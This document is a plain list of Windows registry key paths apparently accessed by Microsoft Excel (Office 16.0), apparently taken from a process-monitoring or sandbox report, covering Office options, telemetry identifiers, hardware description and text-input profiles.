HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\LanguageResources\LocalCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LocalCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LocalCache\RegionalAndLanguageSettingsAccount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\InstallFonts
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Graphics\EnableWinCompBackEnd
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Rpc\SecurityService
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\SecurityService
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\SecurityService\DefaultAuthLevel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Graphics
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Graphics
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize\AppsUseLightTheme
HKEY_CURRENT_USER\Software\Microsoft\Direct3D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Direct3D
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Direct3D\Drivers
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\Drivers
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\Drivers\Size
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\Drivers\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Direct3D\DX6TextureEnumInclusionList
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DX6TextureEnumInclusionList
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\DX6TextureEnumInclusionList\Size
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\DX6TextureEnumInclusionList\Name
HKEY_LOCAL_MACHINE\Software\Microsoft\SecurityManager\TransientObjects\%5C%5C.%5CRpc%5CAllowLpacAppExperience%5CInterface
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\SecurityManager\TransientObjects\%5C%5C.%5CRpc%5CAllowLpacAppExperience%5CInterface\SecurityDescriptor
HKEY_CURRENT_USER\Software\Microsoft\DirectX\UserGpuPreferences
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1EDD7E79811EB814A93FCB6559FABECE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1EDD7E79811EB814A93FCB6559FABECE\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A09ECE35544363439463E4AB55A621E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A09ECE35544363439463E4AB55A621E\00006109F00000000000000000F01FEC
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Resiliency
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Resiliency
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Resiliency
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Resiliency\AddInList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\4$l
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\UID
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration\ProductReleaseIds
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration\ProPlusRetail.TenantId
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6D3588D4312FC664C94D84B670142C50
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6D3588D4312FC664C94D84B670142C50\00006109F00000000000000000F01FEC
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Resiliency\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\Security
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\EnableProcessAslrPolicy
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\GridLineScaleByDpi
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Office\16.0\Excel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\RenderForMonitorDpi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SystemInformation
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SystemInformation\SystemManufacturer
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SystemInformation\SystemProductName
HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0
HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0\~MHz
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\MachineId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MachineID
HKEY_LOCAL_MACHINE\Hardware\Description\System\BIOS
HKEY_LOCAL_MACHINE\Hardware\Description\System\BIOS\SystemFamily
HKEY_LOCAL_MACHINE\Hardware\Description\System\BIOS\SystemSKU
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\MotherboardUUID
HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0\ProcessorNameString
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-932793227-1321892499-785312009-1001\Components\820E548C190EE2442820125F695C950A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\820E548C190EE2442820125F695C950A
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\FeatureListForC2RGimme\EXCELFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ImmersiveWorkbookDirtySentinel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelWorkbookAutoRecoverDirty
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelWorkbookOpenedCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoRecoverTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelPreviousSessionVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelPreviousSessionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UseSystemSeparators
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ThousandsSeparator
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DecimalSeparator
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Toolbars\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ShowLensTooltip
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableTouchUIA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AirDrop
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\AccessDE_Core
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\AccessDE_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Access_Core
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Access_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Ace_OdbcCurrentUser
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Ace_OdbcCurrentUser\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Excel_Core
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Excel_Core\Order
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Ids\en-US
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Excel_Intl\Order
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Ids\en
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\LYNC_HKCU
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\MicrosoftDataStreamerforExcel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\MicrosoftDataStreamerforExcel\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPoint_Core
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPoint_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Word_Core
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Word_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Word_Intl
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Word_Intl\Order
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Excel_Intl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Excel_Intl\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Graph_Core
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Graph_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Graph_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Graph_Core\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\LYNC_HKCU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\AccessDE_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\AccessDE_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\AccessDE_Core\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Intl
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\outexum
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\outexum\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\outexum
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_Intl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_Intl\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\Migration
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\Migration\InstallationPath
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Migration\Office
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Migration\Office
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Migration\Office\OfficeInstallationPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Maximized
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MonitorTopologyFingerprint
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Pos
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AlertForLargeOperations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LargeOperationCellCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options5
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options6
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options95
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\OptionFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\BinaryOptions
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Options\BinaryOptions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DDECleaned
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DDEAllowed
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\General
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AlertIfNotDefault
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoDec
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MenuKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoFormat Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\StickyPtX
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\StickyPtY
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoChartFontScaling
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SortCaseSensitive
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CustomSortOrder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MoveEnterDir
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FlashFill
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ExtendList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CaretTracksSemiSelect
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableFourDigitYearDisplay
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CfDDELink
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableNetworkResiliency
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoHyperlink
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoExpandListRange
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoCreateCalcCol
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Error Checking
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Error Checking
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableAutoRepublish
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableAutoRepublishWarning
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Xl9_Hijri
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Jasper
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\WarnFuncConflict
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LivePreview
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SuppressDisplayAlerts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableParenFlash
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableBestFitMT
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EmbedUpdateRemoteReferences
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableMTP
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\IME
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IME
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP
HKEY_CURRENT_USER\Software\Policies\Microsoft\CTF
HKEY_CURRENT_USER\Software\Microsoft\CTF
HKEY_CURRENT_USER\Software\Microsoft\CTF\Disable Thread Input Manager
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{03b5835f-f03c-411b-9ce2-aa23e1171e36}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{03b5835f-f03c-411b-9ce2-aa23e1171e36}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{07EB03D6-B001-41DF-9192-BF9B841EE71F}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{07EB03D6-B001-41DF-9192-BF9B841EE71F}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{531fdebf-9b4c-4a43-a2aa-960e8fcdc732}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{531fdebf-9b4c-4a43-a2aa-960e8fcdc732}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{6a498709-e00b-4c45-a018-8f9e4081ae40}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{6a498709-e00b-4c45-a018-8f9e4081ae40}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{6a498709-e00b-4c45-a018-8f9e4081ae40}\LanguageProfile\0x00000804
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{6a498709-e00b-4c45-a018-8f9e4081ae40}\LanguageProfile\0x00000804\{82590C13-F4DD-44f4-BA1D-8667246FDF8E}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{6a498709-e00b-4c45-a018-8f9e4081ae40}\LanguageProfile\0x00000804\{82590C13-F4DD-44f4-BA1D-8667246FDF8E}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{78CB5B0E-26ED-4FCC-854C-77E8F3D1AA80}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{78CB5B0E-26ED-4FCC-854C-77E8F3D1AA80}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{7C472071-36A7-4709-88CC-859513E583A9}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{7C472071-36A7-4709-88CC-859513E583A9}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{81d4e9c9-1d3b-41bc-9e6c-4b40bf79e35e}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81d4e9c9-1d3b-41bc-9e6c-4b40bf79e35e}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81d4e9c9-1d3b-41bc-9e6c-4b40bf79e35e}\LanguageProfile\0x00000804
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81d4e9c9-1d3b-41bc-9e6c-4b40bf79e35e}\LanguageProfile\0x00000804\{FA550B04-5AD7-411f-A5AC-CA038EC515D7}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81d4e9c9-1d3b-41bc-9e6c-4b40bf79e35e}\LanguageProfile\0x00000804\{FA550B04-5AD7-411f-A5AC-CA038EC515D7}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\LanguageProfile\0x0000ffff
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\LanguageProfile\0x0000ffff\{B37D4237-8D1A-412E-9026-538FE16DF216}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\LanguageProfile\0x0000ffff\{B37D4237-8D1A-412E-9026-538FE16DF216}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{a028ae76-01b1-46c2-99c4-acd9858ae02f}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{a028ae76-01b1-46c2-99c4-acd9858ae02f}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{a1e2b86b-924a-4d43-80f6-8a820df7190f}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{a1e2b86b-924a-4d43-80f6-8a820df7190f}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{B115690A-EA02-48D5-A231-E3578D2FDF80}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{B115690A-EA02-48D5-A231-E3578D2FDF80}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{C2CB2CF0-AF47-413E-9780-8BC3A3C16068}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{C2CB2CF0-AF47-413E-9780-8BC3A3C16068}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000404
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000404\{037B2C25-480C-4D7F-B027-D6CA6B69788A}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000404\{037B2C25-480C-4D7F-B027-D6CA6B69788A}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000404\{D38EFF65-AA46-4FD5-91A7-67845FB02F5B}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000404\{D38EFF65-AA46-4FD5-91A7-67845FB02F5B}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000473
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000473\{3CAB88B7-CC3E-46A6-9765-B772AD7761FF}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000473\{3CAB88B7-CC3E-46A6-9765-B772AD7761FF}\Enable
